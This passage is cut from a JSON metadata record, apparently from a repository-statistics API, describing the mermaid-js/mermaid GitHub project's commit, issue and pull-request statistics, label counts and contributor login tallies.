Orlandoni","email":"ignacio@softwareis.cool","login":"IOrlandoni","count":1},{"name":"Regis Bittencourt","email":"regisbsbittencourt@gmail.com","login":"regisbsb","count":1},{"name":"Remco Haszing","email":"remcohaszing@gmail.com","login":"remcohaszing","count":1},{"name":"Robson Piere","email":"11904136+robsonpiere","login":"robsonpiere","count":1},{"name":"Royal Jain","email":"royal@codeparrot.ai","login":"royaljain","count":1},{"name":"eitsupi","email":"50911393+eitsupi","login":"eitsupi","count":1},{"name":"yoshinorin","email":"yoshinorin.net@outlook.com","login":"yoshinorin","count":1}],"past_year_total_commits":1542,"past_year_total_committers":84,"past_year_total_bot_commits":187,"past_year_total_bot_committers":3,"past_year_mean_commits":18.357142857142858,"past_year_dds":0.8190661478599222,"last_synced_at":"2025-07-04T14:47:04.191Z","last_synced_commit":"91f141f772feb084fdc1065813229c86327af6c0","created_at":"2023-03-06T22:03:59.200Z","updated_at":"2025-07-04T14:47:11.859Z","commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2025-08-30T00:00:08.254Z","repositories_count":5479765,"commits_count":853310153,"contributors_count":31095234,"owners_count":906558,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues_stats":{"full_name":"mermaid-js/mermaid","html_url":"https://github.com/mermaid-js/mermaid","last_synced_at":"2025-09-05T09:43:11.835Z","status":null,"issues_count":1455,"pull_requests_count":1777,"avg_time_to_close_issue":28542620.459340658,"avg_time_to_close_pull_request":2086451.8557692308,"issues_closed_count":453,"pull_requests_closed_count":1352,"pull_request_authors_count":360,"issue_authors_count":1154,"avg_comments_per_issue":3.370446735395189,"avg_comments_per_pull_request":3.8818232976927405,"merged_pull_requests_count":1087,"bot_issues_count":2,"bot_pull_requests_count":341,"past_year_issues_count":439,"past_year_pull_requests_count":806,"past_year_avg_time_to_close_issue":1380901.3846153845,"past_year_avg_time_to_close_pull_request":1088846.8110687023,"past_year_issues_closed_count":65,"past_year_pull_requests_closed_count":524,"past_year_pull_request_authors_count":166,"past_year_issue_authors_count":354,"past_year_avg_comments_per_issue":0.3211845102505695,"past_year_avg_comments_per_pull_request":3.970223325062035,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":167,"past_year_merged_pull_requests_count":409,"created_at":"2023-05-11T11:39:24.490Z","updated_at":"2025-09-05T09:43:11.837Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","issue_labels_count":{"Status: Triage":1052,"Type: Bug / Error":802,"Type: Enhancement":409,"Status: Approved":184,"Contributor needed":129,"Type: New Diagram":93,"Graph: Flow":90,"Good first issue!":76,"Area: Development":59,"Graph: Class":56,"Type: Other":48,"Internals: Parser":35,"Close after 30 days":35,"Graph: Sequence":33,"Status: Awaiting PR":28,"Status: Awaiting Reply":24,"Graph: Gantt":23,"Type: Question":20,"Internals: Renderer":18,"Graph: Entity Relationship":18,"Graph: State":17,"Status: Pending":17,"Status: In progress":14,"Area: Documentation":13,"Type: New Shape":13,"fosshack":10,"roadmap":9,"Graph: Git":9,"Graph: Pie":8,"Graph: Mindmap":7,"duplicate":6,"Status: Resolved":6,"Retained":5,"Graph: Timeline":5,"P1":5,"Discussion":5,"Graph: Requirement":3,"Graph: Sankey":3,"Status: Wont Fix":3,"Graph: XY":3,"Sponsored by MermaidChart":2,"Area: DevOps":2,"Graph: Block":2,"chore":1,"Graph: User journey":1,"dependencies":1,"Breaking Change":1,"fix":1,"P2":1,"Internals: Database":1,"Topic: Accessibility":1,"Topic: Styling":1,"P3":1},"pull_request_labels_count":{"Type: Bug / Error":145,"Type: Enhancement":106,"Area: Documentation":91,"Type: Other":55,"Sponsored by MermaidChart":53,"Area: DevOps":18,"Area: Development":17,"feature":17,"Skip changelog":14,"Graph: Flow":12,"Breaking Change":10,"spam":10,"Graph: Gantt":9,"fix":9,"Graph: Class":8,"dependencies":8,"Type: New Diagram":6,"Graph: Sequence":6,"Discussion":6,"Internals: Renderer":5,"Graph: Entity Relationship":5,"Internals: Parser":5,"Status: In progress":5,"Graph: Git":5,"Status: Awaiting Reply":4,"Graph: Timeline":4,"chore":4,"Close after 30 days":3,"Graph: Block":2,"codex":2,"Graph: State":2,"Graph: Architecture":2,"Graph: Pie":2,"Type: Performance":2,"Graph: Sankey":2,"Status: Triage":1,"DUPE":1,"Type: PR":1},"issue_author_associations_count":{"NONE":1233,"CONTRIBUTOR":146,"MEMBER":38,"COLLABORATOR":38},"pull_request_author_associations_count":{"CONTRIBUTOR":782,"NONE":429,"MEMBER":428,"COLLABORATOR":138},"issue_authors":{"knsv":32,"sidharthv96":22,"shubham-mermaid":11,"HariSekhon":9,"nirname":8,"nourhenta":8,"Mister-Hope":7,"wouterbeek":6,"nour0205":6,"ad1992":6,"jsoref":6,"RokeJulianLockhart":6,"ghost":5,"oryx-it":5,"sjackson0109":4,"emersonbottero":4,"Thoybur-Rohman":4,"apeacock1991":4,"NicolasCwy":4,"RichardJECooke":4,"alex-papaioannou":4,"Yokozuna59":4,"bollwyvl":4,"kairi003":4,"hakanson":4,"NourBenz":3,"generrosity":3,"zszen":3,"pinage404":3,"Jmuccigr":3,"MayurMundekar":3,"VladimirAlexiev":3,"GDFaber":3,"BambioGaming":3,"init-dcat-ap-de":3,"pajaro1966":3,"djibe":3,"Ogglas":3,"italomaia-bk":3,"Ronid1":3,"ittayd":3,"ketozhang":3,"KSR-Yasuda":3,"dennisl68-castra":3,"shubhamparikh2704":3,"Yash-Singh1":3,"zhouhana":3,"The-Alchemist":3,"cmahnke":3,"tribbloid":2,"raja3315a":2,"drdozer":2,"migueltorrescosta":2,"voroninp":2,"jk2K":2,"Billiam":2,"megantriplett":2,"henri9813":2,"kimulaco":2,"xsa":2,"wanand":2,"GoulartNogueira":2,"whitelizard":2,"mpusz":2,"TomasHubelbauer":2,"ozyx":2,"fabiospampinato":2,"ijmitch":2,"Tylersuard":2,"jerryc127":2,"bstordrup":2,"toolness":2,"brunolnetto":2,"Timac":2,"PHHENS":2,"elgalu":2,"AlexanderWillner":2,"martinSDT":2,"dbartholomae":2,"ksilverwall":2,"spbert29":2,"ZcuBa":2,"TeaDrinkingProgrammer":2,"cskeogh":2,"chrisbloom7":2,"mrmanc":2,"tommoor":2,"chaeron":2,"SaanchitaV":2,"simov":2,"pbreheny":2,"vassudanagunta":2,"FutzMonitor":2,"aloisklink":2,"ilya-vv":2,"fralau":2,"jfontsaballs":2,"null1235":2,"marcosh":2,"one2ndpiece":2,"FirstTimeInForever":2,"dwhieb":2,"rowanfr":2,"AndrewScribner":2,"AlphaJack":2,"thegoatherder":2,"GitSparTV":2,"vorburger":2,"fazleyazdan":2,"simonborje":2,"conan-chiles":2,"nicolas-goyon":2,"xenoterracide":2,"streamich":2,"aubertc":2,"acalvo":2,"Badboyboom":2,"guypursey":2,"tah96":2,"luin":2,"ashishjain0512":2,"GavinPen":2,"jgreywolf":2,"oasis1500":2,"abnerlee":2,"awhitford":2,"Hi-Angel":2,"humble-barnacle001":2,"Vitir266":2,"mi-kra":2,"lethefrost":2,"jayaprabhakar":2,"SailorMax":2,"NicolasNewman":2,"weedySeaDragon":2,"silkentrance":2,"drok":2,"sushmangupta":2,"jgclark":2,"adamfk":2,"McShelby":2,"sadata7":2,"CAFxX":2,"anlai46":2,"LuisBL":2,"slorber":2,"paesku":1,"guy4261":1,"Jiehong":1,"ladypiapia":1,"nitsanavni":1,"mejutoco":1,"PackElend":1,"NielsHenrikBruun":1,"lhy666":1,"securitygeneration":1,"rishavs":1,"Nears":1,"l-e-e-o":1,"anvar-ramazanov":1,"Crell":1,"CyborgMaster":1,"aress31":1,"ta-mv":1,"segevfiner":1,"pberndt":1,"stechio":1,"zhangping":1,"zagkleishman":1,"Incognito":1,"FeddyLix17":1,"TWiStErRob":1,"caffo":1,"DrorHarari":1,"Gliptal":1,"vikrantkamble1":1,"iansan5653":1,"jjregis":1,"MathieuJC":1,"ziidonato":1,"rrajaCF":1,"cristeab":1,"kdrvn":1,"liu-huitao":1,"jgunstone":1,"Hentioe":1,"arukiidou":1,"vikyboy":1,"johnbender":1,"gjain7":1,"kovasap":1,"arkadianriver":1,"kurago-dev":1,"jagadeesh-r1":1,"JoblersTune":1,"devinhedge":1,"mkschulze":1,"ClarkZaitun":1,"pineapplemachine":1,"RaphMcGee23":1,"zywu2":1,"electroluxcode":1,"Alejo224":1,"HonamLi":1,"ccll":1,"wizbit":1,"atollk":1,"parasaurolophus":1,"IHMEkaleb":1,"marcuskw":1,"LibraHo":1,"suelambot":1,"digitalmoksha":1,"swinadeor":1,"Reabstraction":1,"yoavst":1,"glureau":1,"TSSlade":1,"huihui925":1,"Judp0m":1,"jgarciadelanoceda":1,"zhiqiangxu":1,"luca-script":1,"marcpre":1,"nataliebivens":1,"lukewis":1,"thefasquelle":1,"npapnet":1,"lnihlen":1,"flyisland":1,"varon":1,"lrecknagel":1,"raschCZ":1,"ckipp01":1,"mieulium":1,"PiRomant":1,"georgelichen":1,"Jarivanbakel":1,"Callum-Halton":1,"aaraney":1,"lijh8":1,"duffercn":1,"sneakers-the-rat":1,"TheWildParamecium":1,"AnthonyFebles":1,"eduo":1,"joisun":1,"surya-srivastava":1,"SpringbokBE":1,"welliegeee":1,"thaheemDev":1,"schwa021":1,"jboog1123":1,"chripu":1,"lesteral":1,"sheeeng":1,"mgrubb":1,"valkum":1,"LLyaudet":1,"amatiasq":1,"tobie":1,"ozum":1,"zhum":1,"Vanuan":1,"devinnasar":1,"zronal":1,"jason-curtis":1,"R3B04N":1,"cnglen":1,"shikaan":1,"vwkd":1,"chu121su12":1,"vzhyvov":1,"markeenrw":1,"namgivu":1,"ioggstream":1,"mvandermade":1,"Haroenv":1,"tolomea":1,"Limbend":1,"Clopos-Rovshan-Badirkhanov":1,"chrisdunlopnz":1,"JaneX8":1,"zjslqshqz":1,"OxNinja":1,"simondorfman":1,"hsolbrig":1,"Arthessia":1,"skultetymichal":1,"JBBianchi":1,"rene-martin-pbm-healthcare":1,"PradeepDurairaj-int":1,"rrichardson":1,"Andras-Csanyi":1,"3e9b":1,"gvenzl":1,"duaneking":1,"danekt":1,"cskeeters":1,"NickBorgersOnLowSecurityNode":1,"DrGriff":1,"csandanov":1,"emacsen":1,"HectorPeeters":1,"secnigma":1,"jon-freed":1,"Tnze":1,"khs26":1,"SrishtiSonam":1,"hukacode":1,"NichUK":1,"Unbinilium":1,"alnvdl-work":1,"rennerom":1,"littlesandra88":1,"Volland":1,"IgorKrupenja":1,"mikesamuel":1,"anadal-fundaciobit":1,"chrisirhc":1,"JPHutchins":1,"whitenoisedev":1,"skylee03":1,"chrisfcarroll":1,"tcm0116":1,"walex999":1,"markjohn":1,"meeuwtjes":1,"shashank1010":1,"ifarai":1,"drleehw":1,"tylerlong":1,"Hugofbf21":1,"ArtjomE":1,"timjstewart1024":1,"odros":1,"irm-codebase":1,"zejiran":1,"cotemok":1,"DeD1rk":1,"yangeos":1,"fwalch":1,"lwalker-kforce":1,"PetrLaskevic":1,"johnnydecimal":1,"rogeralsing":1,"ringerc":1,"katzuv":1,"denkpass":1,"quan787":1,"omkarht":1,"Soptq":1,"aztack":1,"ClementDecaux":1,"altomani":1,"SaschaWeisenberger":1,"aliyome":1,"RiyanshiTomar":1,"JohnAtChetwood":1,"uniqueqidian":1,"justmars":1,"PFigs":1,"hornse":1,"combinatorist":1,"MechMK1":1,"jgwinner":1,"benibilme":1,"xperiandri":1,"Masahiro-Mizutani":1,"darin-lead":1,"chardskarth":1,"pimpinwannabe":1,"aptMattKoe":1,"Ircama":1,"wheeOs":1,"Grunthos":1,"vanbrayne":1,"serhhatsari":1,"Friedolito":1,"aalong-tr":1,"nonodev96":1,"dmenisdev":1,"jkleiser":1,"saurabhg772244":1,"youngcitrus":1,"elzabeth":1,"ArturMichalak":1,"threonorm":1,"TripleDogDare":1,"pavlo":1,"pashagolub":1,"stefanstranger":1,"craxal":1,"zoeyTM":1,"mitinarseny":1,"K-lone":1,"gerukin":1,"ross-spencer":1,"xinnj":1,"jbukszar":1,"shokai":1,"bnzone":1,"ShineZaw123":1,"FlorentP42":1,"markus-96":1,"vikram-rawat":1,"atuttle":1,"Frank-Uwe":1,"mikehapner":1,"FrostKiwi":1,"harwoodr":1,"SamHasler":1,"ThreeDP":1,"syauqi":1,"maliberty":1,"copilot-a-sys":1,"exoego":1,"5FeetUnder":1,"sewolf":1,"ACMCMC":1,"mankoff":1,"ManonMarchand":1,"jameshowison":1,"samchon":1,"alshdavid":1,"remcohaszing":1,"lauraceconi":1,"huyz":1,"ArashPartow":1,"jxu":1,"vk-0-7":1,"prullanferragut":1,"wikilpmk":1,"manasbeck97765-art":1,"mingfang":1,"hamad12a":1,"RichardoC":1,"jaschop-1k5o":1,"fagner-koho":1,"delanym":1,"Downchuck":1,"PackRuble":1,"rusinikita":1,"l0b0":1,"MrAntix":1,"opensourceportfolio":1,"Zumbala":1,"gergelyk":1,"ciuliene":1,"gwpl":1,"JWBWork":1,"rehevkor5":1,"arden13":1,"hanxiaohuivc":1,"Electro-resonance":1,"zgornel":1,"theogf":1,"AKStratus":1,"cdhit":1,"pgarciaq":1,"copperybean":1,"jonathan-r-young":1,"Oipo":1,"mxschons":1,"Maia313":1,"BugliL":1,"yarongon":1,"jabcross":1,"koutbo6":1,"deniswsrosa":1,"ppggff":1,"alexomics":1,"BlazingTwist":1,"micxer":1,"chloebrett":1,"TapaniJamsen":1,"Seanmatthews":1,"jsolbrig":1,"mohsenoid":1,"Rogeriohsjr":1,"Annopick":1,"tymokvo":1,"HashanCP":1,"danieljuschus":1,"NagayamaToshiaki":1,"loco-philippe":1,"mayank1513":1,"aldeirfrancisco":1,"estranged42":1,"kou-sia":1,"Nahuel92":1,"toastal":1,"hogo7":1,"Wong1dev":1,"amusarra":1,"djadmin":1,"FredStober":1,"peter-csala":1,"youarehou":1,"dandaviesbrackett":1,"huynhicode":1,"jodavaho":1,"jorlando-tuik":1,"BryanCrotazGivEnergy":1,"arimus":1,"injecteer":1,"biubiubiuu":1,"diceroll123":1,"pje":1,"ijunxyz123":1,"weweave":1,"life2022":1,"binLep":1,"schicks":1,"verbeckshin":1,"ppseprus":1,"cmnstmntmn":1,"shouziws":1,"chris-braidwell":1,"chrimaho":1,"d0uub":1,"quilicicf":1,"kool79":1,"okoeroo":1,"stevexm":1,"tamdaz":1,"jens2017kam":1,"sualeh":1,"fseesink":1,"Spixmaster":1,"jgroom33":1,"robross0606":1,"loozhengyuan":1,"bprb":1,"Leblake":1,"josecastillolema":1,"Vogel612":1,"FaryarKankash":1,"godofecht":1,"sshah135":1,"marcelotto":1,"haoqin8620":1,"metapost":1,"botteroxom":1,"bheads":1,"d-sauer":1,"frehberg":1,"Tinger-X":1,"Ray26123":1,"ArchiDog1998":1,"sk0gen":1,"omaus":1,"mkuo-notion":1,"grafst":1,"Alevale":1,"cdgeorge":1,"lxzhu":1,"maziac":1,"radu781":1,"wasphin":1,"sho1884":1,"castlesnow":1,"Jovillios":1,"ldsands":1,"heaths":1,"houghtonap":1,"olayway":1,"tsteinholz":1,"Nhienlv99":1,"pitecantropo":1,"mmcdermott":1,"szeitlin":1,"dkaszews":1,"tojamrok":1,"IbrahimHindawi":1,"Tomperez98":1,"mfulton26":1,"mateu-at-itb":1,"dvarrazzo":1,"sirnails":1,"renovate[bot]":1,"immortal-boy":1,"terra40rm":1,"LingkKang":1,"TonyBrookILSTU":1,"isidore":1,"ScriptBloom":1,"NVolcz":1,"vidur149":1,"d33bs":1,"yk-liu":1,"elbakerino":1,"cbugk":1,"furqanms":1,"mukesh-cesit":1,"MaxenceGui":1,"xh-w":1,"anchernyaev":1,"BossHogg97":1,"zomgbre":1,"fbehrens":1,"criyle":1,"tomdaly":1,"cpelley":1,"Matthew0x":1,"megaadam":1,"kagerouttepaso":1,"michaelschufi":1,"luizfbicalho":1,"GingaaBread":1,"handsomefox":1,"thelinguist":1,"torfjelde":1,"emmachase":1,"Duberry":1,"matevz":1,"OG-NI":1,"omer-priel":1,"ShawnTuatara":1,"qinbinhua601":1,"enwi":1,"FadySalama":1,"ssmooncoder":1,"setsuna-fb":1,"McCache":1,"mjmatthiesen":1,"aCoo4ie":1,"viktorprogger":1,"ReneLombard":1,"NXML":1,"Dreknith":1,"onford":1,"technoplato":1,"gvlx":1,"mrjoel":1,"sysescool":1,"Ali99947":1,"panwarab":1,"oeyoews":1,"tcbuzor":1,"amacsmith":1,"rorysmyth":1,"DanielLipowicz":1,"colindean":1,"lschierer":1,"DanWillans":1,"DonaverBoxwood":1,"Mikek16":1,"mure":1,"juansc":1,"joachim-n":1,"dpal":1,"Azam-Ra":1,"rkc-rkc":1,"deajan":1,"PiotrFerenc":1,"jpl-jengelke":1,"mdmaarschalk":1,"Luke-Guangzhong":1,"a-vishar":1,"CaptainHarlockSSX":1,"ramstein74":1,"zephyraft":1,"Alanterrer":1,"ideless":1,"MateiMitran":1,"googlelxhgithub":1,"Minghao2812":1,"yooneskh":1,"sdegutis":1,"flywire":1,"Kilig947":1,"graycat27":1,"ilikerome":1,"dav1tj":1,"chipbite":1,"xyfuestc":1,"jacbz":1,"ucodery":1,"st-trade":1,"kurthamilton":1,"vesper8":1,"Jsamson33":1,"sanidayalgupta":1,"LordAro":1,"tleish":1,"huoyanlieniao":1,"MarioVanDenEijnde":1,"jpVm5jYYRE1VIKL":1,"HsiehChakwai":1,"indexing":1,"justkash":1,"RoyiAvital":1,"aadityabhatia":1,"threepistons":1,"72636c":1,"morgen-peschke":1,"paul42":1,"smeghead":1,"PLukas2018":1,"emmby":1,"facelessuser":1,"mariotoffia":1,"OleksiiParastiukSage":1,"nalgeon":1,"AlbinoGeek":1,"danturn":1,"ajuckel":1,"voidmain":1,"morganrallen":1,"Shion1305":1,"Koepisch":1,"lazyky":1,"roninbar":1,"renierr":1,"TszwangKo":1,"k12ish":1,"dazinator":1,"oliv3r":1,"Bitmaximus":1,"notuntoward":1,"CapinWinky":1,"rijenkii":1,"luttje":1,"banketvv":1,"johannchopin":1,"LeonardoRamos":1,"soichisumi":1,"nousernameavailableanymore":1,"Anthony-Gaudino":1,"Yan-minghao":1,"ioquatix":1,"0xshellming":1,"MohitMurotiya":1,"SethRobertson":1,"WingDust":1,"51ngul4r1ty":1,"GrupaRX7":1,"ThakareIshan":1,"816-8055":1,"manuel-rubio":1,"kevbry":1,"CapitanPrimate":1,"Baraka24":1,"ahtshammustafa":1,"h0lg":1,"huineng":1,"CraigYoung-iress":1,"cbryant42":1,"kofifus":1,"jmg-duarte":1,"mestaritonttu":1,"daviewales":1,"kostkams":1,"irqsAreFun":1,"kevin-james-sp":1,"ErMagnificoo":1,"stefan-girlich":1,"QriDoki":1,"dancolq":1,"luooofan":1,"dantezhu":1,"Xavier776":1,"tuyen-at-work":1,"noamraph":1,"oglops":1,"glebsam":1,"boboboneX":1,"mmc41":1,"pawskipawel":1,"Yue-Meng-Zhao":1,"chriscconte":1,"mikaeljagelid":1,"mccalluc":1,"vhorvath001":1,"blackmad":1,"arpitjain099":1,"Usokkie":1,"isalew":1,"petruut":1,"ginger-tek":1,"mattmccormick":1,"leeminhan":1,"plotkin-trisense":1,"GregEisenberg":1,"drw0if":1,"samlikins":1,"maiermic":1,"hkws":1,"TeUm3048":1,"BrazilAmando":1,"WhySeeYC":1,"Grazfather":1,"DanielOaks":1,"gherman-cs":1,"t-ir":1,"alex-titarenko":1,"mzedeler":1,"Vanessa219":1,"stephenteacher":1,"nacho4d":1,"rpalsa1":1,"baynezy":1,"guilhem":1,"BrunoGiacomazzi":1,"Juddd":1,"dloeckx":1,"yellowpattern":1,"fasteddys":1,"EHanst":1,"weoam":1,"cafenroy":1,"sharma9012mahesh":1,"thiagoolsilva":1,"FarhadG":1,"macherel":1,"chaursiyasanjeet":1,"frederikfab":1,"Forge36":1,"tomjn":1,"cmavelis":1,"kad-beekw":1,"Alexandre-SCHOEPP":1,"Stemt":1,"ihabawad":1,"AlbertusMagnus7":1,"wj3171868":1,"AMBudnik":1,"wehub":1,"accarvajal":1,"yllgl":1,"Coderambling":1,"adel-belkhiri":1,"baby-gnu":1,"simon04":1,"FranklinYu":1,"Grovkillen":1,"goplayerjuggler":1,"kiranbhadani":1,"aaqib-ahmed-nazir":1,"BrianMinister":1,"lumenwrites":1,"ForrestFeng":1,"maikol-solis":1,"Shanmugapriya001":1,"DavidCampbell-architect":1,"ericjameszimmerman":1,"AndreiShenets":1,"howtoesc":1,"gonzalobg":1,"cpivot":1,"PhilippSchwaab":1,"nicolas-guilhot":1,"FuadEfendi":1,"philsturgeon":1,"ArnaudB88":1,"benfortuna":1,"DarkTrick":1,"viblo-majority":1,"lfilho":1,"RickStrahl":1,"RavinderSingh191":1,"mootari":1,"aniruddhachanda":1,"aryzing":1,"lilian-lilifox":1,"Andromelus":1,"DetachHead":1,"qnton":1,"kurotych":1,"codenet":1,"pymumu":1,"iCirconflexe":1,"dariuszwojtowicz":1,"shiniizk":1,"Banger":1,"Bunker-D":1,"petitours":1,"lt72":1,"d2a-raudenaerde":1,"Carus11":1,"lonix1":1,"FatCash":1,"gliu20":1,"xiaozzzi":1,"forAllBright":1,"bschlenk":1,"sstchur":1,"aj-stein-nist":1,"teppeson":1,"HeinvR":1,"nekoya":1,"michalstrelec":1,"danielniccoli":1,"fdq09eca":1,"Xorok":1,"sumbrez":1,"yuhuading":1,"mokagio":1,"e-pet":1,"mclayton7":1,"karthxk07":1,"zhuwenyun":1,"bryandamon":1,"zjy-dev":1,"ProbablePrime":1,"almathie":1,"tomperr":1,"MajorTom327":1,"MikeSQ":1,"anubane":1,"fgmarand":1,"sjn":1,"GOKULNATH-RS":1,"digulla":1,"JoA-MoS":1,"stevemuench":1,"aohorodnyk":1,"neel-m":1,"cmorganBE":1,"skillmaker-dev":1,"Aziz-repo":1,"ajmalmohad":1,"Adam-Antios":1,"mpelley":1,"hanchchch":1,"tsnobip":1,"fabio-s-franco":1,"bitbonk":1,"danivideda":1,"bentito":1,"GiovanH":1,"Sean10":1,"rodcloutier":1,"LucasHaug":1,"ivynya":1,"paul-sachs":1,"hikerpig":1,"Oliad-R":1,"bartkamphorst":1,"peterejkemp":1,"KevinArlin":1,"pminkov":1,"rami3l":1,"ferdnyc":1,"akulmehta":1,"jonabc":1,"chrycheng":1,"clhodapp":1,"MichelLaplane":1,"piperoc":1,"debajyotisaikia1":1,"rhysd":1,"FieryRMS":1,"Rico9001":1,"thatbeautifuldream":1,"cduguet":1,"olli4":1,"BnJam":1,"whoacowboy":1,"brean":1,"seemaPatel16":1,"petterostergren":1,"ToBeNiceMan":1,"mikeahmarani":1,"fengliner":1,"WillianGruber":1,"reakaleek":1,"ChristopherA":1,"bloempot71":1,"adarsh-sgh":1,"mohankannan6785":1,"domeniczz":1,"vermiculus":1,"leaderli":1,"victor":1,"mike-usa":1,"jesse23":1,"lukas-tide":1,"aromeronavia":1,"DavidRittscher":1,"danimihalca":1,"dragrubis":1,"idmake-github":1,"Ikki-Dai":1,"Mingun":1,"colideum":1,"sduveen-pivot":1,"iconics-milan":1,"kalatchev":1,"briz123":1,"Nixxen":1,"sgaechter":1,"GreedyPirate":1,"Disshell":1,"tiarasilva":1,"hqgu":1,"MJDSys":1,"ksdavidc":1,"dayspring2chen":1,"riiswa":1,"ayroblu":1,"felciano":1,"tomasvanrijsse":1,"rajasekaran2003":1,"bundgaard":1,"iainhallam":1,"redexp":1,"fugohan":1,"vdusek":1,"azat-io":1,"pascha00":1,"RSS1102":1,"yamada-wacul":1,"QazCetelic":1,"pkcpkc":1,"amna-pullflow":1,"wojtek717":1,"mantielero":1,"PumpkinJui":1,"ChenxiangWang":1,"nicanor-busto":1,"Guido-Vi":1,"moedn":1,"aeneasr":1,"jocfico":1,"TheRancid":1,"datamonk3y":1,"Kaiser-Zheng":1,"josephzidell":1,"64kramsystem":1,"shekharsom":1,"hojberg":1,"veritime-nft":1,"karollewandowski":1,"abhashksingh":1,"raboof":1,"andar1an":1,"xkernal":1,"goyalyashpal":1,"silverwind":1,"karagenit":1,"EswaraSatya":1,"Vturnus":1,"flabb17":1,"Phebonacci":1,"jonmattgray":1,"OrionSehn":1,"pintergreg":1,"becca-tiessen":1,"LuPro":1,"yari-dewalt":1,"sby-a-izumi":1,"bendqh1":1,"fritx":1,"sowillwe":1,"Connor-Bernard":1,"MoeJD":1,"justinmchase":1,"tautvilas":1,"hjamaleddine":1,"ehuelsmann":1,"cdaringe":1,"mrm-david":1,"dbnex14":1,"LuAPi":1,"kamibo":1,"mtrakal":1,"johnmdesjardins":1,"arjansingh":1,"nkavian":1,"aharris":1,"robert35":1,"inverted-capital":1,"daniporr":1,"mvonweis":1,"drbrain":1,"noamross":1,"merlinuwe":1,"rwbennett":1,"jenschude":1,"hjfreyer":1,"macro0000":1,"InAnYan":1,"jasonphillips":1,"MyPrototypeWhat":1,"nanoant":1,"vicaya":1,"jkirk-denaliai":1,"ch1y0q":1,"190n":1,"Foadsf":1,"Shahir-47":1,"mateusza":1,"peter-jerry-ye":1,"jiludvik":1,"thienphuoc86":1,"dyc3":1,"ouvreboite":1,"3esmit":1,"wcheek":1,"virgildotcodes":1,"fulldecent":1,"benjaminSchilling33":1,"TendTo":1,"ajhwheeler":1,"gerteck":1,"UnoYakshi":1,"R1ckyH":1,"junka":1,"ted-marozzi":1,"nagyv":1,"tamlok":1,"keenanwells-tatari":1,"queses":1,"abhishek-hopstack":1,"borekb":1,"D0kRay":1,"AstrickHarren":1,"ForbiddenEra":1,"daixtrose":1,"darkgirl":1,"pbnj":1,"guyellis":1,"Rednas83":1,"henrikingo":1,"FOSSforlife":1,"carbeer":1,"dwSun":1,"kabaluyot":1,"dependabot[bot]":1,"nicklasb":1,"darkedges":1,"AlGuil":1,"kehwar":1,"vanillajonathan":1,"Deliaz":1,"JamesMcIntyre100":1,"yegao":1,"jcurtis-cc":1,"mrleblanc101":1,"GRASBOCK":1,"bmitc":1,"AndreKurait":1,"rgoubet":1,"ZeroRadius":1,"aadamsx":1,"antonhattendorf":1,"polina-c":1,"arsium":1,"purocean":1,"twdtech":1,"jkillingsworth":1,"lfuhr":1},"pull_request_authors":{"sidharthv96":261,"renovate[bot]":247,"github-actions[bot]":87,"huynhicode":83,"aloisklink":42,"knsv":38,"saurabhg772244":28,"darshanr0107":26,"nour0205":25,"Yokozuna59":23,"shubham-mermaid":23,"yari-dewalt":21,"ashishjain0512":20,"FutzMonitor":19,"jgreywolf":17,"ad1992":16,"omkarht":16,"nirname":15,"Ronid1":15,"NicolasNewman":12,"rajat-ht":11,"nourhenta":10,"Yash-Singh1":10,"BambioGaming":10,"Shahir-47":10,"Abrifq":10,"kairi003":9,"jsoref":8,"bollwyvl":8,"dontry":8,"jeswr":8,"dependabot[bot]":7,"mathbraga":7,"thomascizeron":7,"remcohaszing":7,"NicolasCwy":6,"CoyAce":6,"BaumiCoder":6,"mmorel-35":6,"dreathed":5,"exoego":5,"ajuckel":5,"ban-abhijit":5,"rowanfr":4,"MrCoder":4,"d-faure":4,"FelixMarcus":4,"shubhamparikh2704":4,"yarikoptic":4,"megantriplett":4,"gregberge":4,"tomperr":4,"KawtharAlakri":4,"igorwessel":4,"kriss-u":4,"jbriales":4,"Mandzhi":4,"thedustin":4,"Austin-Fulbright":4,"JingyuMarcelLee":4,"weedySeaDragon":4,"IOrlandoni":4,"Robbbo-T":4,"yogitas-ht":4,"subhash-halder":3,"Baraka24":3,"Mikek16":3,"evan-moon":3,"enourbakhsh":3,"TeaDrinkingProgrammer":3,"ibrahimWassouf":3,"NourBenz":3,"alex-titarenko":3,"BoDonkey":3,"omer-priel":3,"monicanguyen25":3,"Incognito":3,"JackuB":3,"quilicicf":3,"bprb":3,"Zorbing":3,"dhananjaydeshmukhperforce":2,"deining":2,"AaronMoat":2,"frantic1048":2,"Miguelborrego2000":2,"ThreeDP":2,"mRcOol7":2,"abitrolly":2,"camueller":2,"NealGooch":2,"Maia313":2,"mnito":2,"tommoor":2,"Jason3S":2,"dansseg":2,"jrobichaud":2,"daanklijn":2,"iSparsh":2,"gabeidx":2,"P1394":2,"afmireski":2,"space-77":2,"AngeloChecked":2,"samuei":2,"gemmaro":2,"amine-a11":2,"ryanwjackson":2,"inverted-capital":2,"iansan5653":2,"drkhalidmd":2,"theHacker":2,"kimulaco":2,"arukiidou":2,"internetisaiah":2,"suelambot":2,"rlmark":2,"mejutoco":2,"okineadev":2,"Justin-Garey":2,"michaelbaudino":2,"fzag":2,"claudia584498":2,"schicks":2,"BryanCrotazGivEnergy":2,"jahredhope":2,"cbugk":2,"neuromechanist":2,"maxstanley":2,"OG-NI":2,"Gla08":2,"Caellian":2,"robsonpiere":2,"bibehbibe":2,"jonmcewen":2,"qraqras":2,"Zumbala":2,"MikaBerglund":2,"loucadufault":2,"dwhelan":2,"lgazo":2,"gaurav-chaurasia":2,"jakobskrym":2,"darkedges":2,"alexchen1337":2,"stereobooster":2,"gancena":2,"murdoa":2,"swirtSJW":2,"Actpohomoc":2,"MoonBall":2,"guzzit":2,"MikeSQ":2,"Olegt0rr":2,"nimec01":2,"jayaprabhakar":2,"Gusted":2,"mgrubb":2,"demonsgalore":2,"binary8421":2,"lrecknagel":2,"kedar49":2,"rohanod":2,"Kalasag20":2,"80avin":2,"gbremond":2,"TWiStErRob":2,"Aryangp":2,"Syn3ugar":2,"ilyes-ced":2,"R